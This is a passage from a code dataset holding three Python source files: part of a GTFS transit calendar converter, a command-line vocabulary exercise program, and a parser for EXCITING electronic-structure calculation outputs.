self.__saveCalendarPeriod()\n self.__saveValidDays()\n\n def __saveCalendarPeriod(self):\n # save calendar in worker for future using\n self._worker.Period = self.__period\n\n # create Period\n calperiod = self._netObjectFactory.CreateCalendarPeriod(calType = 3,\n validFrom = self.__period.StartDateString(),\n validUntil = self.__period.EndDateString())\n\n self._visumTables.AddCalendarPeriodEntry(calperiod)\n\n\n def __saveValidDays(self):\n for serviceId, validDaysVect in self.__serviceIdToValidDaysVector.iteritems():\n valDays = self._netObjectFactory.CreateValidDays(name = serviceId,\n code = serviceId,\n dayVector = validDaysVect)\n\n self._visumTables.AddValidDaysEntry(serviceId, valDays)\n\n @classmethod\n def __createDefaultValidDaysString(cls, periodLength):\n return u\"0\" * periodLength\n\n def __getDefaultValidDaysVector(self):\n return list(self.__never)\n\n def __determineCalendarPeriod(self):\n \"\"\"Read the Period Period defined in the Google Transit files.\"\"\"\n minDate, maxDate = self.__getMinAndMaxCalendarDates()\n\n self.__period = Period(minDate, maxDate)\n self.__never = self.__createDefaultValidDaysString(self.__period.length)\n\n\n def __getMinAndMaxCalendarDates(self):\n \"\"\"Find the calendar period defined in 'calendar' and 'calendar_dates' files.\n Pass through the files to determine min and max dates.\n\n @return: the absolute minimum and maximum dates of the period\"\"\"\n initialMinDate = date.max\n initialMaxDate = date.min\n\n mindate, maxdate = self.__getMinAndMaxDatesFromCalendarFile(initialMinDate, initialMaxDate)\n mindate, maxdate = self.__getMinAndMaxDatesFromDatesFile(mindate, maxdate)\n\n # Check, if we found a calendar dates\n if mindate == initialMinDate:\n mess = _(\"No calendar dates were found.\").decode(\"iso-8859-15\")\n raise ex.GoogleTransitException(mess)\n\n return mindate, maxdate\n\n\n def __getMinAndMaxDatesFromCalendarFile(self, initMin, initMax):\n \"\"\"Find the calendar period defined in the 'calendar' file.\n @return: the absolute minimum and maximum dates\"\"\"\n mindate = initMin\n maxdate = initMax\n\n if 
self._worker.Files.calendarfile:\n\n with self._worker.OpenCSVFile(self._worker.Files.calendarfile) as csvReader:\n try:\n for record in csvReader:\n start = op.MakeDate(self._readRequiredAttribute(record, \"start_date\"))\n end = op.MakeDate(self._readRequiredAttribute(record, \"end_date\"))\n maxdate = max(maxdate, end)\n mindate = min(mindate, start)\n\n except ex.ExecutionCanceled:\n raise\n\n except Exception as e:\n mess = self._createDefaultReadFileExceptionMessage(self._worker.Files.CalendarFileName)\n raise ex.GoogleTransitException(mess, e)\n\n return mindate, maxdate\n\n def __getMinAndMaxDatesFromDatesFile(self, initMin, initMax):\n \"\"\"Find the calendar period defined in the 'calendar_dates' file.\n @return: the absolute minimum and maximum dates\"\"\"\n mindate = initMin\n maxdate = initMax\n\n if self._worker.Files.datesfile:\n\n with self._worker.OpenCSVFile(self._worker.Files.datesfile) as csvReader:\n try:\n for record in csvReader:\n thedate = op.MakeDate(self._readRequiredAttribute(record, \"date\"))\n maxdate = max(maxdate, thedate)\n mindate = min(mindate, thedate)\n\n except ex.ExecutionCanceled:\n raise\n\n except Exception as e:\n mess = self._createDefaultReadFileExceptionMessage(self._worker.Files.DatesFileName)\n raise ex.GoogleTransitException(mess, e)\n\n return mindate, maxdate\n\n\n def __loadValidDays(self):\n self.__loadValidDaysFromCalendarFile()\n self.__loadValidDaysExceptionsFromDatesFile()\n\n def __loadValidDaysFromCalendarFile(self):\n if self._worker.Files.calendarfile == None:\n return\n\n with self._worker.OpenCSVFile(self._worker.Files.calendarfile) as csvReader:\n try:\n for record in csvReader:\n endDate = op.MakeDate(self._readRequiredAttribute(record, \"end_date\"))\n startDate = op.MakeDate(self._readRequiredAttribute(record, \"start_date\"))\n validDaysOfWeekVect = self.__getValidDaysOfWeek(record)\n\n validDaysVect = self.__createValidDaysVector(validDaysOfWeekVect,\n startDate,\n endDate)\n\n serviceId = op.MakeSafeString(self._readRequiredAttribute(record, \"service_id\"))\n self.__serviceIdToValidDaysVector[serviceId] = validDaysVect\n\n except ex.ExecutionCanceled:\n raise\n\n except Exception as e:\n mess = self._createDefaultReadFileExceptionMessage(self._worker.Files.CalendarFileName)\n raise ex.GoogleTransitException(mess, e)\n\n\n def __createValidDaysVector(self, validDaysOfWeekVect, startDate, endDate):\n \"\"\"Create the vector with valid days for the whole period.\n Interpolate valid days of the week to the period between start and end dates.\"\"\"\n fromDayIndex = self.__period.DayIndexFromPeriodBegin(startDate.toordinal())\n toDayIndex = self.__period.DayIndexFromPeriodBegin(endDate.toordinal())\n\n validDaysVect = self.__getDefaultValidDaysVector()\n dayOfWeek = startDate.weekday() # Monday = 0, Tuesday = 1, ...\n\n for i in xrange(fromDayIndex, toDayIndex + 1):\n validDaysVect[i] = validDaysOfWeekVect[dayOfWeek]\n dayOfWeek = self.__getDayOfWeek(dayOfWeek + 1)\n\n return validDaysVect\n\n def __getValidDaysOfWeek(self, record):\n \"\"\"Get the vector with valid days of the week\"\"\"\n weekVect = []\n for weekDay in self.__weekDays:\n attrVal = self._readRequiredAttribute(record, weekDay)\n weekVect.append(attrVal)\n\n return weekVect\n\n @classmethod\n def __getDayOfWeek(cls, dayCount):\n return dayCount % 7\n\n def __loadValidDaysExceptionsFromDatesFile(self):\n if self._worker.Files.datesfile == None:\n return\n\n with self._worker.OpenCSVFile(self._worker.Files.datesfile) as csvReader:\n try:\n exRecorder = 
ValidDaysExceptionRecorder()\n\n for record in csvReader:\n serviceId = op.MakeSafeString(self._readRequiredAttribute(record, \"service_id\"))\n\n if exRecorder.IsNewServiceIdFound(serviceId):\n currentValidDayVect = self.__getOrCreateValidDaysVector(serviceId)\n exRecorder.StartRecordNewValidDaysVector(serviceId,\n currentValidDayVect)\n\n dateAttr = self._readRequiredAttribute(record, \"date\")\n dayIndex = self.__getCalendarDayIndexFromDateStr(dateAttr)\n\n exTypeAttr = self._readRequiredAttribute(record, \"exception_type\")\n isServiceAvalable = self.__isServiceAvailable(exTypeAttr)\n\n exRecorder.SetExceptionForDay(dayIndex, isServiceAvalable)\n\n except ex.ExecutionCanceled:\n raise\n\n except Exception as e:\n mess = self._createDefaultReadFileExceptionMessage(self._worker.Files.DatesFileName)\n raise ex.GoogleTransitException(mess, e)\n\n\n def __isServiceAvailable(self, exceptionType):\n if self.__isServiceAdded(exceptionType):\n return self.__serviceAvailable\n else:\n return self.__serviceNotAvailable\n\n def __isServiceAdded(self, exceptionType):\n return exceptionType == self.__serviceAdded\n\n def __getOrCreateValidDaysVector(self, serviceId):\n \"\"\"Get an already existing valid days vector, or default one.\"\"\"\n validDayVector = self.__serviceIdToValidDaysVector.get(serviceId, None)\n\n if not validDayVector:\n validDayVector = self.__getDefaultValidDaysVector()\n self.__serviceIdToValidDaysVector[serviceId] = validDayVector\n\n return validDayVector\n\n def __getCalendarDayIndexFromDateStr(self, dateStr):\n dayIndex = op.DateStringToDayIndex(dateStr)\n return self.__period.DayIndexFromPeriodBegin(dayIndex)\n\n\nclass ValidDaysExceptionRecorder(object):\n \"\"\"\n The class records exceptions (from regular service schedule)\n into ValidDays vector. 
It gets the ValidDays vector and override\n the service at specific date.\n \"\"\"\n def __init__(self):\n self.__currentValidDaysVect = None\n self.__currentServiceId = None\n\n def StartRecordNewValidDaysVector(self, serviceId, validDaysVect):\n self.__currentValidDaysVect = validDaysVect\n self.__currentServiceId = serviceId\n\n def IsNewServiceIdFound(self, serviceId):\n \"\"\"\n Check, if new service id (different from the current service id) is found.\n \"\"\"\n return serviceId != self.__currentServiceId\n\n def SetExceptionForDay(self, calendarDay, isServiceAvalable):\n \"\"\"Set the new value (is service available or not) for specific date\"\"\"\n self.__currentValidDaysVect[calendarDay] = isServiceAvalable\n","sub_path":"GoogleTransitImport/TransitDataImporter/DataConverter/CalendarPeriodConverter.py","file_name":"CalendarPeriodConverter.py","file_ext":"py","file_size_in_byte":12293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"461104291","text":"import urllib\nimport random\nimport sys\nimport os\nfrom view import View\nfrom question import Question\n\nclass Exercise:\n def __init__(self, wordfile):\n self.view = View()\n self.done = set()\n self.wordfile = wordfile\n self.wordlist = []\n self.remove = False\n self.number = 1\n self.score = {\n \"correct\": 0,\n \"wrong\": 0\n }\n\n def setRemove(self,remove):\n self.remove = remove\n return self\n\n def choice(self):\n if len(self.wordlist) == 0:\n with open(self.wordfile, encoding='utf-8') as file:\n wordlist = file.read()\n if wordlist == '':\n sys.exit(0)\n wordlist = wordlist.split(\"\\n\")\n \n for item in wordlist:\n if item == '':\n wordlist.remove(item)\n\n self.wordlist = list(set(wordlist))\n\n if len(self.wordlist) == 1:\n return None\n else:\n word = ''\n while True:\n word = random.choice(self.wordlist)\n self.wordlist.remove(word)\n if word not in self.done:\n break\n self.done.add(word)\n return word\n\n def do_score(self,operation):\n if operation == 'sync':\n with open(\"score.log\",'w', encoding='utf-8') as file:\n file.write(f\"correct,{self.score['correct']}\\n\")\n file.write(f\"wrong,{self.score['wrong']}\\n\")\n\n elif operation == 'read':\n with open('score.log',encoding='utf-8') as file:\n for line in file:\n pair = line.split(',')\n if pair[0] == 'correct':\n self.score['correct'] = int(pair[1])\n elif pair[1] == 'wrong':\n self.score['wrong'] = int(pair[1])\n\n def run(self):\n errors = []\n word = ''\n while True:\n try:\n word = self.choice()\n if word not in errors:\n exercise = object()\n if word != '' and word != None:\n self.do_score('sync')\n self.do_score('read')\n\n print(f\"#{self.number}\")\n self.number += 1\n exercise = Question(word, self.score, self.remove)\n question = exercise.output()\n if exercise.interact():\n self.score[\"correct\"] += 1\n else:\n self.score[\"wrong\"] += 1\n else:\n exercise = Question('test', self.score, self.remove)\n exercise.exit()\n else:\n continue\n except urllib.error.HTTPError as error:\n errors.append(word)\n print(error)\n print()\n continue\n except IOError as error: \n errors.append(word)\n print(error)\n print()\n continue\n except Exception as error:\n raise error\n\nclass Util:\n def clean(self):\n \"\"\"Clean temp files\"\"\"\n if os.path.exists('score.log'):\n os.remove('score.log')\n if os.path.exists(\"words.tmp\"):\n os.remove('words.tmp')\n if os.path.exists('wordpool.tmp'):\n os.remove('wordpool.tmp')\n if os.path.exists('errors.tmp'):\n os.remove('errors.tmp')\n sys.exit(0)\n\n def 
wordfile(self,argv):\n \"\"\"Decide from which file words will be read\"\"\"\n if_remove = False\n wordfile = ''\n if len(argv) == 1:\n with open(\"wordpool.tmp\",\"w\",encoding=\"utf-8\") as file:\n sources = os.listdir(\"source\")\n for source in sources:\n with open(f\"source/{source}\",encoding='utf-8') as src:\n for word in src:\n file.write(f\"{word}\\n\")\n wordfile = 'wordpool.tmp'\n else:\n if argv[1].lower() == 'wrong':\n with open('errors.tmp','w',encoding='utf-8') as file:\n for filename in os.listdir('wrong'):\n wrongword = filename.strip('.txt')\n file.write(f\"{wrongword}\\n\")\n wordfile = \"errors.tmp\"\n\n if len(argv) == 3:\n if argv[2].lower() == 'remove':\n if_remove = True\n \n elif argv[1].lower() == 'new':\n sources = os.listdir('source')\n sources.sort(key=lambda fn : os.path.getmtime(f'source/{fn}'))\n wordfile = f\"source/{sources[len(sources) - 1]}\"\n else:\n if argv[1].endswith(\".src\"):\n wordfile = f\"source/{argv[1].lower()}\"\n else:\n wordfile = f\"source/{argv[1].lower()}.src\"\n return (wordfile,if_remove)\n\n#Main entry\ndef main():\n #if remove corrected wrong word file\n if_remove = False\n util = Util()\n wordfile,if_remove = util.wordfile(sys.argv)\n\n #Startup\n try:\n View().clear().header(80).title(f\"Exercise on {wordfile}\")\n Exercise(wordfile).setRemove(if_remove).run()\n except Exception as error:\n raise error\n print(error)\n print()\n util.clean()\n pass\n\nmain()","sub_path":"exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":5568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"222528292","text":"\n# EXCITING text logs and XML outputs parser\n# v010814\n\nimport os\nimport sys\nimport math\nfrom fractions import Fraction\n\nfrom xml.etree import ElementTree as ET\nimport xml.dom.minidom\n\nfrom ase.units import Bohr, Hartree\nfrom ase import Atoms\n\nfrom numpy import dot\nfrom numpy import array\nfrom numpy import transpose\nfrom numpy import linalg\n\nfrom parsers import Output\nfrom core.electron_structure import Edos, Ebands\nfrom core.constants import Constants\n\n\n# Non-critical parsing exception\nclass SecondaryParsingError(Exception):\n def __init__(self, value):\n self.value = value\n\n# INFO.OUT parser\nclass INFOOUT(Output):\n def __init__(self, file, **kwargs):\n\n if os.path.basename(file) != 'INFO.OUT': raise RuntimeError(\"Skipping not a master output!\")\n\n Output.__init__(self, file)\n\n cur_folder = os.path.dirname(file)\n\n self.info['framework'] = 'EXCITING'\n self.info['finished'] = -1\n\n cartesian = False\n atoms_holder = [[]]\n cell = []\n forces, energies, energies_opt = [], [], []\n rmts, mtrps, bsseq = [], [], []\n specienum = 0\n first_cycle_lithium, opt_flag = True, False\n\n # TODO: relate with schema file?\n H_mapping = {\n 1: 'pure HF',\n 3: 'LSDAPerdew-Wang',\n 22: 'PBEsol',\n 20: 'PBE-GGA/PBE-GGA',\n 100:'PBE-GGA/PBE-GGA'\n }\n\n self.data = open(file).readlines()\n\n # Main loop begin\n for n in range(len(self.data)):\n line = self.data[n]\n if ' EXCITING ' in line:\n if 'started' in line:\n version = line.split()[2].capitalize()\n if version not in ['Helium', 'Lithium', 'Beryllium', 'Mortadella', 'Boron']: raise RuntimeError(\"This Exciting version is currently not supported!\")\n self.info['prog'] = 'Exciting ' + version\n\n elif 'Convergence targets achieved' in line:\n if not energies_opt: self.info['finished'] = 1\n\n elif 'Force convergence target achieved' in line:\n self.info['finished'] = 1\n\n elif 'Lattice 
vectors' in line:\n for i in range(n+1, n+4):\n cell.append( map(lambda x: float(x) * Bohr, self.data[i].split()) )\n n += 3\n\n elif 'Species : ' in line:\n symb = line.split('(')[-1][:-2].encode('ascii')\n nrepeat = 0\n while 1:\n n += 1\n if 'muffin-tin radius' in self.data[n]:\n rmt = float( self.data[n].split(\":\")[-1].strip() )\n elif 'of radial points in muffin-tin' in self.data[n]:\n mtrp = int( self.data[n].split(\":\")[-1].strip() )\n elif 'atomic positions (' in self.data[n]:\n if not cartesian:\n if not 'lattice' in self.data[n]: cartesian = True\n while 1:\n n += 1\n a = self.data[n].split()\n try: int(a[0])\n except (ValueError, IndexError): break\n else:\n atoms_holder[-1].append([symb])\n atoms_holder[-1][-1].extend( map(float, [a[2], a[3], a[4]]) )\n nrepeat += 1\n break\n if not energies: # do it only for the first structure!\n rmts.extend([rmt] * nrepeat)\n mtrps.extend([mtrp] * nrepeat)\n bsseq.extend([specienum] * nrepeat)\n specienum += 1\n\n elif 'Spin treatment ' in line:\n mark = line.split(\":\")[-1].strip()\n if len(mark): # Beryllium\n if 'spin-polarised' in mark:\n self.info['spin'] = True\n if 'orbit coupling' in self.data[n+1]: self.info['techs'].append('spin-orbit coupling')\n else: # Lithium\n if 'spin-polarised' in self.data[n+1]:\n self.info['spin'] = True\n if 'orbit coupling' in self.data[n+2]: self.info['techs'].append('spin-orbit coupling')\n\n elif 'k-point grid ' in line:\n self.info['k'] = \"x\".join(line.split(\":\")[-1].split())\n\n elif 'Smallest muffin-tin radius times maximum |G+k|' in line: # Lithium\n self.electrons['rgkmax'] = float(line.split(\":\")[-1].strip())\n\n elif 'R^MT_min * |G+k|_max (rgkmax)' in line: # Beryllium\n self.electrons['rgkmax'] = float(line.split(\":\")[-1].strip())\n\n elif 'Smearing scheme ' in line:\n t = line.split(\":\")[-1].strip()\n if len(t): self.info['smeartype'] = t\n else: self.info['smeartype'] = self.data[n+1].split(\":\")[-1].strip()\n\n elif 'Smearing width ' in line:\n self.info['smear'] = float(line.split(\":\")[-1].strip())\n\n elif 'orrelation type ' in line:\n\n #if 'Correlation type :' in line:\n #if 'Exchange-correlation type :' in line:\n #if 'Exchange-correlation type' in line:\n\n try: h = int(line.split(\":\")[-1])\n except ValueError: pass # then this is not what we want\n try: self.info['H'] = H_mapping[h]\n except KeyError: self.info['H'] = h\n\n elif 'otal energy ' in line:\n try: energies.append( float(line.split(\":\")[-1]) * Hartree )\n except ValueError: energies.append(0.0)\n\n elif 'Structure-optimization module started' in line:\n opt_flag = True\n # First cycle convergence statuses\n self.info['convergence'] = self.compare_vals(energies)\n self.info['ncycles'].append(len(self.info['convergence']))\n\n elif '| Updated atomic positions ' in line: # Lithium\n atoms_holder.append([])\n\n if first_cycle_lithium:\n # First cycle convergence statuses\n self.info['convergence'] = self.compare_vals(energies)\n first_cycle_lithium = False\n\n elif '| Optimization step ' in line: # Beryllium\n self.info['finished'] = -1\n atoms_holder.append([])\n while 1:\n n += 1\n\n try: self.data[n]\n except IndexError:\n atoms_holder.pop()\n break\n\n if ' scf iterations ' in self.data[n]:\n self.info['ncycles'].append( int(self.data[n].split(\":\")[-1].split()[0]) )\n elif 'Maximum force magnitude' in self.data[n]:\n f = self.data[n].split(\":\")[-1].split(\"(\")\n forces.append( float(f[0]) - float(f[-1][:-2]) )\n elif 'Total energy' in self.data[n]:\n try: energies_opt.append( 
float(self.data[n].split(\":\")[-1]) * Hartree )\n except ValueError: energies_opt.append(0.0)\n elif 'Atomic positions' in self.data[n]:\n while 1:\n n += 1\n if 'atom' in self.data[n]:\n a = self.data[n].split()\n atoms_holder[-1].append([a[2]])\n atoms_holder[-1][-1].extend( map(float, a[4:]) )\n else: break\n break\n\n elif 'Timings (CPU seconds) ' in line: # Lithium\n while 1:\n n += 1\n if ' total ' in self.data[n]:\n self.info['duration'] = \"%2.2f\" % (float(self.data[n].split(\":\")[-1])/3600)\n break\n elif len(self.data[n]) < 4: break\n self.info['duration']\n\n elif 'Total time spent ' in line: # Beryllium\n self.info['duration'] = \"%2.2f\" % (float(self.data[n].split(\":\")[-1])/3600)\n\n elif line.startswith(' Fermi '):\n try: e_last = float(self.data[n].split(\":\")[-1]) * Hartree\n except ValueError: raise RuntimeError(\"Fermi energy is out of physical bounds! Terminating.\")\n\n elif 'Number of empty states' in line:\n self.info['techs'].append( '%s empty states' % int(self.data[n].split(\":\")[-1]) )\n # Main loop end\n\n if not cell or not atoms_holder[-1]: raise RuntimeError(\"Structure not found!\")\n\n if energies_opt: self.info['energy'] = energies_opt[-1]\n else:\n try: self.info['energy'] = energies[-1]\n except IndexError: pass\n\n if not self.info['convergence']:\n # First cycle convergence statuses\n self.info['convergence'] = self.compare_vals(energies)\n\n if len(forces) != len(energies_opt) or len(forces) != len(self.info['ncycles']): self.warning(\"Warning! Unexpected convergence data format!\")\n else:\n for n in range(len(energies_opt)):\n self.info['tresholds'].append([forces[n], 0.0, 0.0, 0.0, energies_opt[n]])\n\n # NB lattice is always the same\n for structure in atoms_holder:\n symbols, pos = [], []\n for a in structure:\n symbols.append(a[0])\n pos.append(a[1:])\n if cartesian: self.structures.append(Atoms(symbols=symbols, cell=cell, positions=pos, pbc=True))\n else: self.structures.append(Atoms(symbols=symbols, cell=cell, scaled_positions=pos, pbc=True))\n\n # Check if convergence achieved right away from the first cycle and account that\n if opt_flag and len(self.structures) == 1:\n self.structures.append(self.structures[-1])\n self.info['tresholds'].append([0.0, 0.0, 0.0, 0.0, energies[-1]])\n\n self.structures[-1].new_array('rmt', rmts, float)\n self.structures[-1].new_array('mtrp', mtrps, int)\n self.structures[-1].new_array('bs', bsseq, int)\n\n # Warnings\n #try: w = map(lambda x: x.strip(), open(cur_folder + '/WARNINGS.OUT').readlines())\n #except IOError: pass\n #else:\n # # TODO: Get rid of redundant messages\n # # Warning(charge)\n # self.warning( \" \".join(w) )\n\n # Electronic properties: the best case, too good\n # look for full DOS in xml\n if os.path.exists(os.path.join(cur_folder, 'dos.xml')):\n f = open(os.path.join(cur_folder, 'dos.xml'),'r')\n try: self.electrons['dos'] = Edos(parse_dosxml(f, self.structures[-1].get_chemical_symbols()))\n except SecondaryParsingError as e: self.warning(\"Error in dos.xml file: %s.\" % e.value)\n except: self.warning(\"Problems with parsing dos.xml!\")\n finally: f.close()\n\n # look for interpolated bands in xml\n if os.path.exists(os.path.join(cur_folder, 'bandstructure.xml')):\n f = open(os.path.join(cur_folder, 'bandstructure.xml'),'r')\n try: self.electrons['bands'] = Ebands(parse_bandsxml(f))\n except SecondaryParsingError as e: self.warning(\"Error in bandstructure.xml file: %s.\" % e.value)\n except: self.warning(\"Problems with parsing bandstructure.xml!\")\n finally: f.close()\n\n # 
Electronic properties: the worst case, look for total DOS and raw bands in EIGVAL.OUT\n if os.path.exists(os.path.join(cur_folder, 'EIGVAL.OUT')) and (not self.electrons['dos'] or not self.electrons['bands']):\n f = open(os.path.join(cur_folder, 'EIGVAL.OUT'),'r')\n # why such a call? we try to spare RAM\n # so let's look whether these variables are filled\n # and fill them only if needed\n try: kpts, columns = parse_eigvals(f, e_last)\n except SecondaryParsingError as e: self.warning(\"Error in EIGVAL.OUT file: %s.\" % e.value)\n else:\n # obviously below should repeat XML data (but note interpolation problems on small k-sets!)\n if not self.electrons['dos']:\n self.warning(\"dos.xml is absent, EIGVAL.OUT is taken.\")\n for c in columns:\n for i in c:\n self.electrons['projected'].append(i)\n self.electrons['projected'].sort()\n\n if not self.electrons['bands']:\n self.warning(\"bandstructure.xml is absent, EIGVAL.OUT is taken.\")\n band_obj = {'ticks': [], 'abscissa': [], 'stripes': []}\n d = 0.0\n bz_vec_ref = [0, 0, 0]\n for k in kpts:\n bz_vec_cur = dot( k, linalg.inv( self.structures[-1].cell ).transpose() )\n bz_vec_dir = map(sum, zip(bz_vec_cur, bz_vec_ref))\n bz_vec_ref = bz_vec_cur\n d += linalg.norm( bz_vec_dir )\n band_obj['abscissa'].append(d)\n band_obj['stripes'] = transpose(columns).tolist()\n self.electrons['bands'] = Ebands(band_obj)\n\n finally: f.close()\n\n if not self.electrons['dos'] and not self.electrons['bands']: self.warning(\"Electron structure not found!\")\n self.electrons['type'] = 'FP_LAPW'\n\n # Input\n try: inp = xml.dom.minidom.parse(os.path.join(cur_folder, 'input.xml'))\n except: self.warning(\"Problems with parsing input.xml!\")\n else:\n speciespath = inp.getElementsByTagName(\"structure\")[0].attributes['speciespath'].value\n relpath_flag = False if os.path.isabs(speciespath) else True\n species_types, self.electrons['basis_set'] = [], []\n\n for sp in inp.getElementsByTagName(\"species\"):\n v = sp.attributes['speciesfile'].value\n if not v in species_types: species_types.append(v)\n for sp in species_types:\n # TODO: https://docs.python.org/2/library/xml.html#xml-vulnerabilities\n try_path = os.path.realpath( os.path.join(cur_folder, os.path.join(speciespath, sp)) ) if relpath_flag else os.path.join(speciespath, sp) # WARNING! 
This may be dangerous!\n if not os.path.exists(try_path):\n self.electrons['basis_set'] = None\n self.warning(\"No BS available: %s cannot be found!\" % try_path)\n break\n else:\n try: self.electrons['basis_set'] += [ parse_specie(try_path) ]\n except SecondaryParsingError as e:\n self.electrons['basis_set'] = None\n self.warning(\"Error in specie file: %s\" % e.value)\n\n self.info['input'] = inp.toprettyxml(newl=\"\", indent=\" \")\n\n # Phonons\n if os.path.exists(os.path.join(cur_folder, 'PHONON.OUT')):\n f = open(os.path.join(cur_folder, 'PHONON.OUT'), 'r')\n linelist = f.readlines()\n filelen = len(linelist)\n n_at = len(self.structures[-1])\n n_line = 0\n while n_line < filelen:\n n_line += 1\n modes, irreps, ph_eigvecs = [], [], []\n k_coords = \" \".join( map(lambda x: \"%s\" % Fraction(x), linelist[n_line].split()[1:4]) ) # TODO : find weight of every symmetry k-point!\n\n # next line is empty\n n_line += 2\n for i in range(n_at*3):\n\n # read mode number and frequency\n modes.append( float(linelist[n_line].split()[1]) * Constants.ha2rcm )\n irreps.append(\"\")\n n_line += 1\n\n # read eigenvectors\n container = []\n for atom in range(n_at):\n for disp in range(3):\n try: container.append( float(linelist[n_line].split()[3]) )\n except ValueError: container.append(0.0)\n #float(linelist[n_line].split()[4])\n n_line += 1\n\n ph_eigvecs.append(container)\n\n # two empty lines follow\n n_line +=1\n\n self.phonons['modes'][ k_coords ] = modes\n self.phonons['irreps'][ k_coords ] = irreps\n self.phonons['ph_eigvecs'][ k_coords ] = ph_eigvecs\n\n f.close()\n\n kset = self.phonons['modes'].keys()\n if kset > 1:\n for i in kset:\n self.phonons['ph_k_degeneracy'][ i ] = 1 # TODO : find weight of every symmetry k-point!\n\n def compare_vals(self, vals):\n cmp = []\n for n in range(len(vals)):\n try: cmp.append( int( math.floor( math.log( abs( vals[n] - vals[n+1] ), 10 ) ) ) )\n except (IndexError, ValueError): pass # beware log math domain error when the adjacent values are the same\n return cmp\n\n @staticmethod\n def fingerprints(test_string):\n if test_string.startswith('All units are atomic (Hartree, Bohr, etc.)') or test_string.startswith('| All units are atomic (Hartree, Bohr, etc.)'): return True\n else: return False\n\n# dos.xml parser\ndef parse_dosxml(fp, symbols):\n dos_obj = {'x': [],}\n dos = []\n symbol_counter = 0\n first_cyc, new_part = True, True\n\n for action, elem in ET.iterparse(fp, events=('end',)):\n if elem.tag=='totaldos':\n if len(dos) != len(dos_obj['x']): raise SecondaryParsingError(\"Data in dos.xml are mismatched!\")\n dos_obj['total'] = dos\n dos, new_part = [], True\n\n elif elem.tag=='partialdos':\n target_atom = elem.attrib['speciessym']\n if not target_atom:\n target_atom = symbols[symbol_counter]\n symbol_counter += 1\n if not target_atom in dos_obj: dos_obj[target_atom] = dos\n else:\n if len(dos) != len(dos_obj[target_atom]): raise SecondaryParsingError(\"Unexpected data format in dos.xml!\")\n dos_obj[target_atom] = [sum(s) for s in zip( dos_obj[target_atom], dos )]\n dos, new_part = [], True\n\n elif elem.tag=='interstitialdos':\n dos_obj['interstitial'] = dos\n dos, new_part = [], True\n\n elif elem.tag=='diagram':\n if not new_part:\n # orbital contributions are merged : TODO\n # spins are merged : TODO\n dos = [sum(s) for s in zip( dos[ : len(dos)/2], dos[len(dos)/2 : ] )]\n\n #spin = {1: 'alpha', 2: 'beta'}\n #target_spin = spin[ int( elem.attrib['nspin'] ) ]\n #if 'n' in elem.attrib: n = elem.attrib['n']\n #if 'l' in elem.attrib: l = 
elem.attrib['l']\n\n first_cyc, new_part = False, False\n\n elif elem.tag=='point':\n if first_cyc: dos_obj['x'].append( float(elem.attrib['e']) * Hartree )\n dos.append(float(elem.attrib['dos']))\n\n elem.clear()\n\n return dos_obj\n\n# bandstructure.xml parser\ndef parse_bandsxml(fp):\n band_obj = {'ticks': [], 'abscissa': [], 'stripes': [[],]}\n first_cyc = True\n\n for action, elem in ET.iterparse(fp, events=('end',)):\n if elem.tag=='band':\n band_obj['stripes'].append([])\n first_cyc = False\n\n elif elem.tag=='point':\n if first_cyc: band_obj['abscissa'].append( float(elem.attrib['distance']) )\n band_obj['stripes'][-1].append(float(elem.attrib['eval']) * Hartree)\n\n elif elem.tag=='vertex':\n band_obj['ticks'].append( [ float(elem.attrib['distance']), elem.attrib['label'] ] ) # NB : elem.attrib['coord']\n\n elem.clear()\n\n if band_obj['ticks'][0][0] != band_obj['abscissa'][0] or band_obj['ticks'][-1][0] != band_obj['abscissa'][-1]: raise SecondaryParsingError(\"Unexpected data format in bandstructure.xml!\")\n band_obj['stripes'].pop() # last []\n\n return band_obj\n\n# EIGVAL.OUT parser\ndef parse_eigvals(fp, e_last):\n kpts = []\n columns = []\n while 1:\n s = fp.readline()\n if not s: break\n s = s.strip()\n if len(s) < 20: # first two lines or section dividers\n if not columns:\n columns.append([])\n continue\n if not columns[-1]:\n continue\n else:\n columns[-1] = map(lambda x: x-e_last, columns[-1])\n columns.append([])\n elif len(s) > 45: # k-point coords\n kpts.append( map(float, s.split()[1:4]) )\n else:\n try: int(s[0])\n except ValueError: # comment\n continue\n else:\n n, e, occ = s.split()\n columns[-1].append(float(e)*Hartree)\n columns.pop() # last []\n columns = array(columns)\n if columns.ndim != 2: raise SecondaryParsingError('Invalid dimensions of columns!')\n return kpts, columns\n\n# species parser\ndef parse_specie(path):\n azimuthal_sequence = ['s', 'p', 'd', 'f', 'g', 'h']\n basis = {}\n try: specie = xml.dom.minidom.parse(path)\n except: raise SecondaryParsingError(\"Unable to parse %s\" % path)\n else:\n #elem = specie.getElementsByTagName(\"sp\")[0].attributes['chemicalSymbol'].value\n mt = specie.getElementsByTagName(\"muffinTin\")[0]\n basis['rmin'] = float(mt.attributes['rmin'].value) # innermost grid point (!)\n basis['rmt'] = float(mt.attributes['radius'].value) # default rmt\n basis['rinf'] = float(mt.attributes['rinf'].value) # effective infinity\n basis['rmtp'] = int(mt.attributes['radialmeshPoints'].value) # grid points in the muffin tin (!)\n \n basis['states'] = []\n for atst in specie.getElementsByTagName(\"atomicState\"):\n basis['states'].append({})\n basis['states'][-1]['n'] = int(atst.attributes['n'].value)\n basis['states'][-1]['l'] = azimuthal_sequence[ int(atst.attributes['l'].value) ]\n basis['states'][-1]['kappa'] = int(atst.attributes['kappa'].value)\n basis['states'][-1]['occ'] = int(float(atst.attributes['occ'].value))\n basis['states'][-1]['is_core'] = True if atst.attributes['core'].value.lower() == 'true' else False\n basis['states'].sort(cmp = lambda x, y: -1 if azimuthal_sequence.index(x['l']) < azimuthal_sequence.index(y['l']) else 1) # accordingly\n basis['states'].sort(cmp = lambda x, y: -1 if x['n'] < y['n'] else 1) # accordingly\n \n basis['default'] = {}\n default = specie.getElementsByTagName(\"default\")[0]\n basis['default']['type'] = default.attributes['type'].value\n basis['default']['trialEnergy'] = float(default.attributes['trialEnergy'].value)\n basis['default']['searchE'] = True if 
